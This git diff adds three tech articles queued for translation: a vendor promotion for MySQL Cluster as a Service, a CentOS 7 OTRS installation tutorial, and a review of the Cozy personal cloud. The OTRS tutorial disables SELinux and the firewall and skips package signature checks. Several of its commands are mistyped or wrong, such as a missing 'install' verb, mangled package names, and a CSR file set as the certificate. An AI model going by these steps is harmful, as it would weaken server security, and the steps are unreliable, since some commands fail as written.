Service + +### What is a MySQL Cluster? + +If you have ever wondered how you can increase the reliability and scalability of your MySQL database you might have found that one of the ways to do that is through a **MySQL Cluster** based on **Galera Cluster** technology. + +This technology allows you to have a complete copy of the MySQL database synchronized across many servers in one or several datacenters. This lets you achieve high database availability – which means that if `1` or more of your database servers crash then you will still have a fully operational database on another server. + +It is important to note that the minimum number of servers in a **MySQL Cluster** is `3` because when one server recovers from a crash it needs to copy data from one of the remaining two servers making one of them a “**donor**“. So in case of crash recovery you must have at least two online servers from which the crashed server can recover the data. + +Also, a [MariaDB cluster][3] is essentially the same thing as MySQL cluster just based on a newer and more optimized version on MySQL. + +[ + ![MySQL Clusters Galera Replications](http://www.tecmint.com/wp-content/uploads/2017/01/MySQL-Clusters-Galera-Replications.png) +][4] + +MySQL Clusters Galera Replications + +### What is a MySQL Cluster and MariaDB Cluster as a Service? + +**MySQL Clusters** as a service offer you a great way to achieve both requirements at the same time. + +First, you get **High Database Availability** with a high probability of **100% Uptime** in case of any datacenter issues. + +Secondly, outsourcing the tedious tasks associated with managing a mysql cluster let you focus on your business instead of spending time on cluster management. + +In fact, managing a cluster on your own may require you to perform the following tasks: + +1. **Provision and setup the cluster** – may take you a few hours of an experienced database administrator to fully setup an operational cluster. +2. **Monitor the cluster** – one of your techs must keep an eye on the cluster 24×7 because many issues can happen – cluster desynchronization, server crash, disk getting full etc. +3. **Optimize and resize the cluster** – this can be a huge pain if you have a large database and you need to resize the cluster. This task needs to be handled with extra care. +4. **Backups management** – you need to backup your cluster data to avoid it being lost if your cluster fails. +5. **Issue resolution** – you need an experienced engineer who will be able to dedicate a lot of effort optimizing and solving issues with your cluster. + +Instead, you can save a lot of time and money by going with a **MySQL Cluster** as a Service offered by **MySQLcluster.me** team. + +###### So what’s included into MySQL Cluster as a Service offered by MySQLcluster.me? + +Apart from high database availability with an almost guaranteed uptime of **100%**, you get the ability to: + +1. **Resize the MySQL Cluster at any time** – you can increase or decrease cluster resources to adjust for the spikes in your traffic (RAM, CPU, Disk). +2. **Optimized Disks and Database Performance** – disks can achieve a rate of **100,000 IOPS** which is crucial for database operation. +3. **Datacenter Choice** – you can decide in which datacenter you would like to host the cluster. Currently supported – Digital Ocean, Amazon AWS, RackSpace, Google Compute Engine. +4. **24×7 Cluster Support** – if anything happens to your cluster our team will always assist you and even provide you advice on your cluster architecture. +5. **Cluster Backups** – our team sets up backups for you so that your cluster is automatically backed up on a daily basis to a secure location. +6. **Cluster Monitoring** – our team sets up automatic monitoring so in case of any issue our team starts working on your cluster even if you are away from your desk. + +There are a lot of advantages of having your own **MySQL Cluster** but this must be done with care and experience. + +Speak to [MySQL Cluster][5] team to find the best suitable package for you. + +-------------------------------------------------------------------------------- + +作者简介: + +I am Ravi Saive, creator of TecMint. A Computer Geek and Linux Guru who loves to share tricks and tips on Internet. Most Of My Servers runs on Open Source Platform called Linux. Follow Me: Twitter, Facebook and Google+ + +-------------------------------------------- + +via: http://www.tecmint.com/getting-started-with-mysql-clusters-as-a-service/ + +作者:[Ravi Saive][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[1]:https://www.mysqlcluster.me/#utm_source=tecmintpost1&utm_campaign=tecmintpost1&utm_medium=tecmintpost1 +[2]:http://www.tecmint.com/wp-content/uploads/2017/01/MySQL-Clusters-Service.png +[3]:https://www.mysqlcluster.me/#utm_source=tecmintpost1&utm_campaign=tecmintpost1&utm_medium=tecmintpost1 +[4]:http://www.tecmint.com/wp-content/uploads/2017/01/MySQL-Clusters-Galera-Replications.png +[5]:https://www.mysqlcluster.me/#utm_source=tecmintpost1&utm_campaign=tecmintpost1&utm_medium=tecmintpost1 diff --git a/sources/tech/20170131 How to install OTRS (OpenSource Trouble Ticket System) on CentOS 7.md b/sources/tech/20170131 How to install OTRS (OpenSource Trouble Ticket System) on CentOS 7.md new file mode 100644 index 0000000000..4a3c3e18a0 --- /dev/null +++ b/sources/tech/20170131 How to install OTRS (OpenSource Trouble Ticket System) on CentOS 7.md @@ -0,0 +1,631 @@ +How to install OTRS (OpenSource Trouble Ticket System) on CentOS 7 +============================================================ + +### On this page + +1. [The Environment][1] +2. [Preparation][2] +3. [Install MariaDB on Centos 7][3] +4. [Install EPEL ][4] +5. [Install OTRS][5] +6. [Configure OTRS on CentOS 7][6] + +OTRS (open-source trouble ticket system software) is a sophisticated open source software used by companies to improve their operation related to customer support, help desk, call centers and more. OTRS is written in PERL and provides the following important features: + +* Customers can register and create/interact with a Ticket via the customer portal and by email, phone, and fax with each queue (Attendants/Technicians post box). +* Tickets can be managed by their priority, assignment, transmission and follow-up. A ticket can be split, merged, bulk actions can be applied, and links to each other and notifications can be set. Services can be configurated through the service catalog. +* To increase the team capacity, auto email (automatic answers), text templates and signatures can be configured. The system supports notes and attachments on tickets. +* Others capabilities include: statistics and reports (CSV/PDF), SLA and many other features. + +### The Environment + +This article covers the OTRS 5 installation and basic configuration. This article was writen based on the following enviroment: A Virtual Box VM with CENTOS 7 Minimal, 2GB RAM, 8GB HD and 2 network interfaces (host only and NAT). + +### Preparation + +Assuming that you use a fresh installation of Centos 7 Minimal,  before to install OTRS, run the following command to update the system and install aditional packages:  + +``` +yum update +``` + +Transaction Summary ================================================================================ Install 1 Package Upgrade 39 Packages Total download size: 91 M Is this ok [y/d/N]: **y** + +Install a text editor or use VI. In this article we use VIM, run the following command to install it: + +``` +yum install vim +``` + +To install the WGET package, run the following command: + +``` +yum install wget +``` + +To configure the Centos 7 network, run the following command to open the NMTUI (Network Manager Text User Interface) tool and edit the interfaces and hostname if nescessary: + +``` +nmtui +``` + +[ + ![](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.jpg) +][7] + + After setup of network settings and hostname on CentOS 7, run the following command to apply the changes: + +``` +service networks restart +``` + +To verify the network information, run the following command: + +``` +ip addr +``` + +The output looks like this on my system: + +``` +1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1 + link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 + inet 127.0.0.1/8 scope host lo + valid_lft forever preferred_lft forever + inet6 ::1/128 scope host + valid_lft forever preferred_lft forever +2: enp0s3: mtu 1500 qdisc pfifo_fast state UP qlen 1000 + link/ether 08:00:27:67:bc:73 brd ff:ff:ff:ff:ff:ff + inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic enp0s3 + valid_lft 84631sec preferred_lft 84631sec + inet6 fe80::9e25:c982:1091:90eb/64 scope link + valid_lft forever preferred_lft forever +3: enp0s8: mtu 1500 qdisc pfifo_fast state UP qlen 1000 + link/ether 08:00:27:68:88:f3 brd ff:ff:ff:ff:ff:ff + inet 192.168.56.101/24 brd 192.168.56.255 scope global dynamic enp0s8 + valid_lft 1044sec preferred_lft 1044sec + inet6 fe80::a00:27ff:fe68:88f3/64 scope link + valid_lft forever preferred_lft forever +``` + +Disable SELINUX (Security Enhanced Linux) on Centos 7, edit the following config file: + +``` +vim /etc/selinux/config +``` + +``` +"/etc/selinux/config" 14L, 547C# This file controls the state of SELinux on the system. +# SELINUX= can take one of these three values: +# enforcing - SELinux security policy is enforced. +# permissive - SELinux prints warnings instead of enforcing. +# disabled - No SELinux policy is loaded. +SELINUX=enforcing +# SELINUXTYPE= can take one of three two values: +# targeted - Targeted processes are protected, +# minimum - Modification of targeted policy. Only selected processes are prootected. +# mls - Multi Level Security protection. +SELINUXTYPE=targeted +``` + +Change the value **enforcing** of directive SELINUX to **disabled**, save the file and reboot the server. + +To check the status of SELinux on Centos 7, run the following command: + +``` +getenforce +``` + +The output must be: + +``` +Disabled +``` + +### Install MariaDB on Centos 7 + +To install MariaDB on Centos 7, run the following command: + +``` +yum -y install mariadb-server +``` + +Create the file with the name **zotrs.cnf** in the following directory: + +``` +/etc/my.cnf.d/ +``` + +To create and edit the file, run the following command: + +``` +vim /etc/my.cnf.d/zotrs.cnf +``` + +Fill the file with the following content and save it: + +``` +max_allowed_packet = 20M +query_cache_size = 32M +innodb_log_file_size = 256M +``` + +To start MariaDB, run the following command: + +``` +systemctl start mariadb +``` + +To increase the security of MariaDB, run the following command: + +``` +/usr/bin/mysql_secure_installation +``` + +Setup the options accordind the following output: + +``` +NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MariaDB + SERVERS IN PRODUCTION USE! PLEASE READ EACH STEP CAREFULLY! + +In order to log into MariaDB to secure it, we'll need the current +password for the root user. If you've just installed MariaDB, and +you haven't set the root password yet, the password will be blank, +so you should just press enter here. + +Enter current password for root (enter for none): +``` + +``` +OK, successfully used password, moving on... + +Setting the root password ensures that nobody can log into the MariaDB +root user without the proper authorisation. + +Set root password? [Y/n] +``` + +Set the root password: + +``` +New password: +Re-enter new password: +Password updated successfully! +Reloading privilege tables.. + ... Success! + +By default, a MariaDB installation has an anonymous user, allowing anyone +to log into MariaDB without having to have a user account created for +them. This is intended only for testing, and to make the installation +go a bit smoother. You should remove them before moving into a +production environment. + +Remove anonymous users? [Y/n] +``` + +``` + ... Success! + +Normally, root should only be allowed to connect from 'localhost'. This +ensures that someone cannot guess at the root password from the network. + +Disallow root login remotely? [Y/n] +``` + +``` + ... Success! + +By default, MariaDB comes with a database named 'test' that anyone can +access. This is also intended only for testing, and should be removed +before moving into a production environment. + +Remove test database and access to it? [Y/n] +``` + +``` + - Dropping test database... + ... Success! + - Removing privileges on test database... + ... Success! + +Reloading the privilege tables will ensure that all changes made so far +will take effect immediately. + +Reload privilege tables now? [Y/n] +``` + +``` + ... Success! + +Cleaning up... + +All done! If you've completed all of the above steps, your MariaDB +installation should now be secure. + +Thanks for using MariaDB! + +``` + +Setup MariaDB to start up automatically at boot time: + +systemctl enable mariadb.service + +To download OTRS, run the following command: + +``` +wget http://ftp.otrs.org/pub/otrs/RPMS/rhel/7/otrs-5.0.15-01.n oarch.rpm +``` + +### Install EPEL  + +Before we install OTRS, setup the EPEL repositoy on Centos 7\. Run the following command to do so: + +``` +[root@centos7 ~]# yum -y http://mirror.globo.com/epel/7/x86_64/e/epel-r release-7-9.noarch.rpm +``` + +### Install OTRS + +Install OTRS with the following command: + +``` +yum install -nogpgcheck otrs-5.0.15-01.noarch.rpm +``` + +A list of software package will be installed, eg. Apache and all dependencies will be resolved automatically, at to the end of output press Y: + +``` +Transaction Summary +================================================================================ +Install 1 Package (+143 Dependent packages) + +Total size: 148 M +Total download size: 23 M +Installed size: 181 M +Is this ok [y/d/N]: y +``` + +To start Apache (httpd), run the following command: + +``` +systemctl start httpd.service +``` + +To enable Apache (httpd) startup with systemd on Centos7, run the following command: + +``` +systemctl enable httpd.service +``` + +Enable SSL in Apache and configure a SelfSigned Certificate. Install the Mod_SSL module for the Apache HTTP Server, run the following command: + +``` +yum -y install mod_ssl +``` + +To generate a self-signed SSL certificate, go to the following directory: + +``` +cd /etc/pki/tls/certs/ +``` + +And run the following command to generate the key (centos7.key is the name of my certificate, feel free to change it): + +``` +make centos7.key +``` + +``` +umask 77 ; \ /usr/bin/openssl genrsa -aes128 2048 > centos7.key Generating RSA private key, 2048 bit long modulus .+++ .........................................................................................+++ e is 65537 (0x10001) Enter pass phrase: **** + +Verifying - Enter pass phrase:**** +``` + +To generate the server SSL private key with OpenSSL, run the following command: + +``` +openssl rsa -in centos7.key -out centos7.key +``` + +``` +Enter pass phrase for centos7.key: ** **writing RSA key +``` + +Run the following command to create the CSR (Certificate Signing Request) file (centos7.csr is the name of my certificate, feel free to change it): + +``` +make centos7.csr +``` + +Fill the questions acording your needs: + +``` +umask 77 ; \ /usr/bin/openssl req -utf8 -new -key centos7.key -out centos7.csr You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- + +Country Name (2 letter code) [XX]: + +State or Province Name (full name) []: + +Locality Name (eg, city) [Default City]: + +Organization Name (eg, company) [Default Company Ltd]: + +Organizational Unit Name (eg, section) []: + +Centos7 Common Name (eg, your name or your server's hostname) []: + +Email Address []: + +Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: **** + +An optional company name []: +``` + +Generate a CSR (Certificate Signing Request) for the server with the OpenSSL tool: + +``` +openssl x509 -in centos7.csr -out centos7.crt -req -signkey centos7.key +``` + +The output is: + +``` +Signature ok subject=/C=BR/ST=SP/L=Campinas/O=Centos7/OU=Centos7/CN=centos7.local Getting Private key +``` + +Before we edit the ssl.conf file, make a copy of the file with the following command: + +``` +cp /etc/httpd/conf.d/ssl.conf /etc/httpd/conf.d/ssl.conf.old +``` + +Then edit the file: + +``` +vim /etc/httpd/conf.d/ssl.conf +``` + +Find the following directives, uncomment each one and edit them like this: + +``` +SSLCertificateKeyFile /etc/pki/tls/certs/centos7.key + +SSLCertificateFile /etc/pki/tls/certs/centos7.csr + +SSLProtocol -All +TLSv1 +TLSv1.1 +TLSv1.2 + +ServerName centos7.local:443 +``` + +Restart Apache with the following command: + +``` +systemctl restart httpd +``` + +To force OTRS to run in https mode, edit the following file: + +``` +vim /etc/httpd/conf/httpd.conf +``` + +At the end of file, uncoment the following directive: + +``` +IncludeOptional conf.d/*.conf +``` + +Edit the file zzz_otrs.conf: + +``` +vim /etc/httpd/conf.d/zzz_otrs.conf +``` + +After the line 26 (before the line module  mod_version.c) add the following directives: + +``` +RewriteEngine On +RewriteCond %{HTTPS} off +RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} +``` + +Restart Apache: + +``` +[root@centos7 ~]# systemctl restart httpd +``` + +To use extended features in OTRS, we have to install some PERL modules. Run the following command to install them: + +``` +yum -y install "perl(Text::CSV_XS)" "perl(Crypt::Eksblowfish::Bcrypt)" "perl(YAML::XS)" "perl(JSON::XS)" "perl(Encode::HanExtra)" "perl(Mail::IMAPClient)" "perl(ModPerl::Util)" +``` + +The OTRS system has a tool to check the PERL modules, run it like this to verify the system requirements: + +``` +cd /opt/otrs/bin +``` + +and run: + +``` +./otrs.CheckModules.pl +``` + +The output for our configuration must be: + +``` +o Apache::DBI......................ok (v1.12) o Apache2::Reload..................ok (v0.13) o Archive::Tar.....................ok (v1.92) o Archive::Zip.....................ok (v1.30) o Crypt::Eksblowfish::Bcrypt.......ok (v0.009) o Crypt::SSLeay....................ok (v0.64) o Date::Format.....................ok (v2.24) o DBI..............................ok (v1.627) o DBD::mysql.......................ok (v4.023) o DBD::ODBC........................Not installed! (optional - Required to connect to a MS-SQL database.) o DBD::Oracle......................Not installed! (optional - Required to connect to a Oracle database.) o DBD::Pg..........................Not installed! Use: 'yum install "perl(DBD::Pg)"' (optional - Required to connect to a PostgreSQL database.) o Digest::SHA......................ok (v5.85) o Encode::HanExtra.................ok (v0.23) o IO::Socket::SSL..................ok (v1.94) o JSON::XS.........................ok (v3.01) o List::Util::XS...................ok (v1.27) o LWP::UserAgent...................ok (v6.13) o Mail::IMAPClient.................ok (v3.37) o IO::Socket::SSL................ok (v1.94) o ModPerl::Util....................ok (v2.000010) o Net::DNS.........................ok (v0.72) o Net::LDAP........................ok (v0.56) o Template.........................ok (v2.24) o Template::Stash::XS..............ok (undef) o Text::CSV_XS.....................ok (v1.00) o Time::HiRes......................ok (v1.9725) o Time::Piece......................ok (v1.20_01) o XML::LibXML......................ok (v2.0018) o XML::LibXSLT.....................ok (v1.80) o XML::Parser......................ok (v2.41) o YAML::XS.........................ok (v0.54) +``` + +To start the OTRS Daemon with the "otrs" user, run the following command: + +``` +su -c "/opt/otrs/bin/otrs.Daemon.pl start" -s /bin/bash otrs +``` + +To disable the CentOS 7 firewall, run the following command: + +``` +systemctl stop firewalld +``` + +To disable CentOS 7 Firewall to start up automaticaly, run: + +``` +systemctl disable firewalld.service +``` + +Start the OTRS Daemon with: + +``` +su -c "/opt/otrs/bin/otrs.Daemon.pl start" -s /bin/bash otrsCron.sh +``` + +The output of command must be: + +``` +/opt/otrs/bin Cron.sh - start/stop OTRS cronjobs Copyright (C) 2001-2012 OTRS AG, http://otrs.org/ (using /opt/otrs) done +``` + +If you want to check the OTRS Daemon status, run the following command: + +``` +su -c "/opt/otrs/bin/otrs.Daemon.pl status" -s /bin/bash otrsCron.sh +``` + +Configuring OTRS in the crontab. Change the user root to otrs and start to edit the crontab: + +``` +su otrs + +crontab -e +``` + +Fill the crontab with the following content and save it: + +``` +# -- +# Copyright (C) 2001-2016 OTRS AG, http://otrs.com/ +# -- +# This software comes with ABSOLUTELY NO WARRANTY. For details, see +# the enclosed file COPYING for license information (AGPL). If you +# did not receive this file, see http://www.gnu.org/licenses/agpl.txt. +# -- + +# Who gets the cron emails? +MAILTO="root@localhost" +# -- +# Copyright (C) 2001-2016 OTRS AG, http://otrs.com/ +# -- +# This software comes with ABSOLUTELY NO WARRANTY. For details, see +# the enclosed file COPYING for license information (AGPL). If you +# did not receive this file, see http://www.gnu.org/licenses/agpl.txt. +# -- + +# check OTRS daemon status +*/5 * * * * $HOME/bin/otrs.Daemon.pl start >> /dev/null +``` + +### Configure OTRS on CentOS 7 + +Open a web browser and open the URL [https://centos7.local/otrs/installer.pl][8]. Remember, centos7.local is the name of my server, insert your hostname or IP address. The first screen shows the 4 steps to conclude the OTRS installation, press Next.   + +[ + ![OTRS installation screen](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.13_.jpg) +][9] + +License: to continue, read and accept the license to continue: + +[ + ![Accept the license and continue](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.14_.jpg) +][10]  + +Database Selection: select  the option **MySQL** and in the Install Type, mark the Create a new database for OTRS option and click on the next button: + +[ + ![Select database type mysql](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.15_.jpg) +][11] + +Configure MySQL: fill the fields User, Password and Host (remember the data of the MariaDB configuration that we made) and press check database settings: + +[ + ![Insert database login details](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.16_.jpg) +][12] + +The OTRS installer will create the database in MariaDB, press next button: + +[ + ![Create OTRS database](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.17_.jpg) +][13] + +OTRS database created successfully:  + +[ + ![OTRS Database created](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.18_.jpg) +][14] + +Config system settings: fill the fields with your own information and press next: + +[ + ![Set the personal config details](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.19_.jpg) +][15] + +OTRS E-mail configuration: fill in the fields acording your e-mail server. In my setup, for outbound email I use SMPTTLS and port 587, for inbound email, I use pop3, you will need an e-mail account. Check mail configuration or skip this step: + +[ + ![Email setup in OTRS](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.21_.jpg) +][16] + +To finish, take a note about the user and password to access the OTRS, after login you can change the password: + +[ + ![OTRS Username and password](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.23_.jpg) +][17] + +The OTRS url login is [https://centos7.local/otrs/index.pl?][18]. Remember, centos7.local is the name of my server, insert your hostnamen or IP address.: + +[ + ![Login to OTRS](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.25_.jpg) +][19] + +Login at the OTRS: + +[ + ![OTRS Admin Login](https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/OTRS_How_To_Alexandre_Costa.27_.jpg) +][20] + +OTRS is installed and ready to be configured with your support rules or business model. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/ + +作者:[Alexandre Costa][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/ +[1]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/#thenbspenvironment +[2]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/#preparation +[3]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/#install-mariadb-on-centos- +[4]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/#install-epelnbsp +[5]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/#install-otrs +[6]:https://www.howtoforge.com/tutorial/how-to-install-otrs-on-centos-7/#configure-otrs-on-centos- +[7]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.jpg +[8]:http://centos7.local/otrs/installer.pl +[9]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.13_.jpg +[10]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.14_.jpg +[11]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.15_.jpg +[12]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.16_.jpg +[13]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.17_.jpg +[14]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.18_.jpg +[15]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.19_.jpg +[16]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.21_.jpg +[17]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.23_.jpg +[18]:https://centos7.local/otrs/index.pl +[19]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.25_.jpg +[20]:https://www.howtoforge.com/images/how_to_install_and_configure_otrs_open_source_trouble_ticket_system_software_on_centos_7/big/OTRS_How_To_Alexandre_Costa.27_.jpg diff --git a/sources/tech/20170201 Building your own personal cloud with Cozy.md b/sources/tech/20170201 Building your own personal cloud with Cozy.md new file mode 100644 index 0000000000..0afd5596a7 --- /dev/null +++ b/sources/tech/20170201 Building your own personal cloud with Cozy.md @@ -0,0 +1,97 @@ +Building your own personal cloud with Cozy +============================================================ + + ![Building your own personal cloud with Cozy](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/life_tree_clouds.png?itok=dSV0oTDS "Building your own personal cloud with Cozy") +>Image by : [Pixabay][2]. Modified by Opensource.com. [CC BY-SA 4.0][3] + +Most everyone I know uses some sort of web-based application for their calendar, emails, file storage, and much more. But what if, like me, you've got concerns about privacy, or just want to simplify your digital life into a place you control? [Cozy][4] is a project that is moving in the right direction—toward a robust self-hosted cloud platform. Cozy's source code is available on [GitHub][5], and it is licensed under the AGPL 3.0 license. + +### Installation + +Installing Cozy is snap-easy, with [easy-to-follow instructions][6] for a variety of platforms. For my testing, I'm using Debian 8, 64-bit. The installation takes a few minutes, but then you just go to the server's IP, register an account, and a default set of applications is loaded up and ready to roll. + +One note on this—the installation assumes no other web server is running, and it will want to install [Nginx web server][7]. If your server already has websites running, configuration may be a bit more challenging. My install was on a brand new Virtual Private Server (VPS), so this was a snap. Run the installer, start Nginx, and you're ready to hit the cloud. + +Cozy has [an App Store][8] where you can download additional applications. Some look pretty interesting, like the [Ghost blogging platform][9] and [TiddlyWiki][10] open source wiki. The intent here, clearly, is to allow integration in the platform with lots of other goodies. I think it's just a matter of time before you'll see this start to take off, with many other popular open source applications offering integration abilities. Right now, [Node.js][11] applications are supported, but if other application layers were possible, you'd see that many other good things could happen. + +One capability that is possible is using the free Android application to access your information from Android devices. No iOS app exists, but there is a plan to solve that problem. + +Currently, Cozy comes with a nice set of core applications. + + ![Main Cozy Interface](https://opensource.com/sites/default/files/main_cozy_interface.jpg "Main Cozy Interface") + +Main Cozy interface + +### Files + +Like a lot of folks, I use [Dropbox][12] for file storage. In fact, I pay for Dropbox Pro because I use _so much_ storage. For me, then, moving my files to Cozy would be a money-saver—if it has the features I want. + +I wish I could say it does, truly I do. I was very impressed with the web-based file upload and file-management tool built into the Cozy web application. Drag-and-drop works like you'd expect, and the interface is clean and uncluttered. I had no trouble at all uploading some sample files and folders, navigating around, and moving, deleting, and renaming files. + +If what you want is a web-based cloud file storage, you're set. What's missing, for me, is the selective synchronization of files and folders, which Dropbox has. With Dropbox, if you drop a file in a folder, it's copied out to the cloud and made available to all your synced devices in a matter of minutes. To be fair, [Cozy is working on it][13], but it's in beta and only for Linux clients at the moment. Also, I have a [Chrome][14] extension called [Download to Dropbox][15] that I use to capture images and other content from time to time, and no such tool exists yet for Cozy. + + ![File Manager Interface](https://opensource.com/sites/default/files/cozy_2.jpg "File Manager Interface") + +File Manager interface + +### Importing data from Google + +If you currently use Google Calendar or Contacts, importing these is very easy with the app installed in Cozy. When you authorize access to Google, you're given an API key, which you paste in Cozy, and it performs the copy quickly and efficiently. In both cases, the contents were tagged as having been imported from Google. Given the clutter in my contacts, this is probably a good thing, as it gives you the opportunity to tidy up as you relabel them into more meaningful categories. Calendar events imported all on the "Google Calendar," but I noticed that _some_ of my events had the times incorrect, possibly an artifact of time zone settings on one end or the other. + +### Contacts   + +Contacts works like you'd expect, and the interface looks a _lot_ like Google Contacts. There are a few sticky areas, though. Synchronization with (for instance) your smart phone happens via [CardDAV][16], a standard protocol for sharing contacts data—and a technology that Android phones _do not speak natively_. To sync your contacts to an Android device, you're going to have to load an app on your phone for that. For me, that's a _huge_ strike against it, as I have enough odd apps like that already (work mail versus Gmail versus other mail, oh my!), and I do not want to install another that won't sync up with my smartphone's native contacts application. If you're using an iPhone, you can do CardDAV right out of the box. + +### Calendar   + +The good news for Calendar users is that an Android device _can_ speak [CalDAV][17], the interchange format for this type of data. As I noted with the import app, some of my calendar items came over with the wrong times. I've seen this before with other calendar system moves, so that really didn't bother me much. The interface lets you create and manage multiple calendars, just like with Google, but you can't subscribe to other calendars outside of this Cozy instance. One other quirk is of the app is starting of the week on Monday, which you can't change. Normally, I start my week on Sunday, so changing from Monday would be a useful feature for me. The Settings dialog didn't actually have any settings; it merely gave instructions on how to connect via CalDAV. Again, this application is close to what I need, but Cozy is not quite there. + +### Photos + +The Photos app is pretty impressive, borrowing a lot from the Files application. You can even add photos to an album that are in files in the other app, or upload directly with drag and drop. Unfortunately, I don't see any way to reorder or edit pictures once you've uploaded them. You can only delete them from the album. The app does have a tool for sharing via a token link, and you can specify one or more contact. The system will send those contacts an email inviting them to view the album. There are more feature-rich album applications than this, to be sure, but this is a good start for the Cozy platform. + + ![Photos Interface](https://opensource.com/sites/default/files/cozy_3_0.jpg "Photos Interface") + +Photos interface + +### Final thoughts + +Cozy has some really big goals. They're trying to build a platform where you can deploy _any_ cloud-based service you like. Is it ready for prime time? Not quite. Some of the shortcomings I've mentioned are problematic for power users, and there is no iOS application yet, which may hamper adoption for those users. However, keep an eye on this one—Cozy has the potential, as development continues, to become a one-stop replacement for a great many applications. + +-------------------------------------------------------------------------------- + +译者简介: + +D Ruth Bavousett - D Ruth Bavousett has been a system administrator and software developer for a long, long time, getting her professional start on a VAX 11/780, way back when. She spent a lot of her career (so far) serving the technology needs of libraries, and has been a contributor since 2008 to the Koha open source library automation suite.Ruth is currently a Perl Developer at cPanel in Houston, and also serves as chief of staff for two cats. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/cozy-personal-cloud + +作者:[D Ruth Bavousett][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/druthb +[1]:https://opensource.com/article/17/2/cozy-personal-cloud?rate=FEMc3av4LgYK-jeEscdiqPhSgHZkYNsNCINhOoVR9N8 +[2]:https://pixabay.com/en/tree-field-cornfield-nature-247122/ +[3]:https://creativecommons.org/licenses/by-sa/4.0/ +[4]:https://cozy.io/ +[5]:https://github.com/cozy/cozy +[6]:https://docs.cozy.io/en/host/install/ +[7]:https://www.nginx.com/ +[8]:https://cozy.io/en/apps/ +[9]:https://ghost.org/ +[10]:http://tiddlywiki.com/ +[11]:http://nodejs.org/ +[12]:https://www.dropbox.com/ 